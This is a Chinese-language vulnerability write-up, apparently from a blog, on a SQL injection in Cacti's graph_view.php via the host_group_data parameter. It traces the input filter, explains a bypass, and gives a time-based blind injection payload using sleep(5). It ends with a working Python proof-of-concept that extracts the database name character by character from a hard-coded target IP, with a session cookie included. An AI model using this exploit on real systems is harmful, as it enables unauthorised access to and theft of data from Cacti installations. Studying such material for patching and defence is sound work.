Cacti graph_view.php SQL注入漏洞

存在问题的文件/cacti/graph_view.php:

/* ================= input validation ================= */
input_validate_input_number(get_request_var_request('branch_id'));
input_validate_input_number(get_request_var_request('hide'));
input_validate_input_number(get_request_var_request('tree_id'));
input_validate_input_number(get_request_var_request('leaf_id'));
input_validate_input_number(get_request_var_request('rra_id'));
input_validate_input_regex(get_request_var_request('graph_list'), '^([\,0-9]+)$');
input_validate_input_regex(get_request_var_request('graph_add'), '^([\,0-9]+)$');
input_validate_input_regex(get_request_var_request('graph_remove'), '^([\,0-9]+)$');
input_validate_input_regex(get_request_var_request('nodeid'), '^([_a-z0-9]+)$');
/* ==================================================== */
...
switch ($_REQUEST['action']) {
case 'tree_content':
    validate_tree_vars(); // attesion here
...
        grow_right_pane_tree((isset($_REQUEST['tree_id']) ? $_REQUEST['tree_id'] : 0), (isset($_REQUEST['leaf_id']) ? $_REQUEST['leaf_id'] : 0), (isset($_REQUEST['host_group_data']) 
        ? urldecode($_REQUEST['host_group_data']) : 0));
}

这里我们跟下function grow_right_pane_tree函数,存在于/lib/html_tree.php :
function grow_right_pane_tree($tree_id, $leaf_id, $host_group_data)
{
global $current_user, $config, $graphs_per_page, $graph_timeshifts;
...
$host_group_data_array = explode(':', $host_group_data);

if ($host_group_data_array[0] == 'graph_template') {
$host_group_data_name = '<strong>Graph Template:</strong> ' . db_fetch_cell('select name from graph_templates where id=' . $host_group_data_array[1]); //这里很像是可以产生注入的地方
$graph_template_id = $host_group_data_array[1];
}
...
}
这看起来好像是可以产生注入的地方,但是validate_tree_vars()是一个变态的过滤函数

function validate_tree_vars() {
    /* ================= input validation ================= */
    input_validate_input_number(get_request_var_request('graphs'));
    input_validate_input_number(get_request_var_request('columns'));
    input_validate_input_number(get_request_var_request('page'));
    input_validate_input_number(get_request_var_request('tree_id'));
    input_validate_input_number(get_request_var_request('leaf_id'));
    /* ==================================================== */

    /* clean up search string */
    if (isset($_REQUEST['filter'])) {
        $_REQUEST['filter'] = sanitize_search_string(get_request_var_request('filter'));
    }

    /* clean up search string */
    if (isset($_REQUEST['thumbnails'])) {
        $_REQUEST['thumbnails'] = sanitize_search_string(get_request_var_request('thumbnails'));
    }

    /* clean up host_group_data string */
    if (isset($_REQUEST['host_group_data'])) {
        $_REQUEST['host_group_data'] = sanitize_search_string(get_request_var_request('host_group_data'));

继续跟踪函数sanitize_search_string,在/lib/functions.php:

function sanitize_search_string($string) {
    static $drop_char_match = array('^', '$', '<', '>', '`', '\'', '"', '|', ',', '?', '+', '[', ']', '{', '}', '#', ';', '!', '=', '*');
    static $drop_char_replace = array(' ', ' ', ' ', ' ', '', '', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ');

    /* Replace line endings by a space */
    $string = preg_replace('/[\n\r]/is', ' ', $string);

    /* HTML entities like   */
    $string = preg_replace('/\b&[a-z]+;\b/', ' ', $string);

    /* Remove URL's */
    $string = preg_replace('/\b[a-z0-9]+:\/\/[a-z0-9\.\-]+(\/[a-z0-9\?\.%_\-\+=&\/]+)?/', ' ', $string);

    /* Filter out strange characters like ^, $, &, change "it's" to "its" */
    for($i = 0; $i < count($drop_char_match); $i++) {
        $string = str_replace($drop_char_match[$i], $drop_char_replace[$i], $string);
    }

    return $string;
}

这貌似过滤的很严格,但是可以利用一些mysql的特性去绕过.让sql注入存活过来
首先登陆cacti
然后去请求http://target/cacti/graph_view.php
POST发送

Data: ____csrf_magic=sid:b0349195c55bddec2f2be859e0f394539ea4569a,1458781575&host_group_data=graph_template:1 union select case when ord(substring((select version()) from 1 for 1)) between 53 and 53 then sleep(5) else 0 end

如果mysql成功延时5秒,那么version()第一个是5

写个poc来验证下

#!/usr/bin/python
# -*- coding: UTF-8 -*-
import httplib
import time
import string
import sys
import random
import urllib
import math

headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'Cookie':
    'cacti_zoom=zoomMode%3Dquick%2CzoomOutPositioning%3Dcenter%2CzoomOutFactor%3D2%2CzoomMarkers%3Dtrue%2CzoomTimestamps%3Dauto%2Czoom3rdMouseButton%3Dfalse; Cacti=7a3e072f5ab62febf94fbedda5128fd0'
}

payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
print 'Starting to retrive MySQL DB:'

db = ''
user = ''

for i in range(1, 6):

    for payload in payloads:
        s = "__csrf_magic=sid:c766dcdb84bc21215af88d112bc9c4f2edc517b4,1458794525&host_group_data=graph_template:1 union select case when ord(substring((select database()) from %s for %s)) between %s and %s then sleep(5) else 0 end" % (
            i, i, ord(payload), ord(payload))

        conn = httplib.HTTPConnection('133.130.98.98', timeout=60)

        conn.request(method='POST',
                     url='/cacti/graph_view.php?action=tree_content',
                     body=s,
                     headers=headers)

        start_time = time.time()

        conn.getresponse()

        conn.close()

        print '.',

        if time.time() - start_time > 5.0:

            db += payload

            print '\n\n[In progress]', db,

            break

print '\n\n[Done] Current database is %s ' % (db)

1

发表评论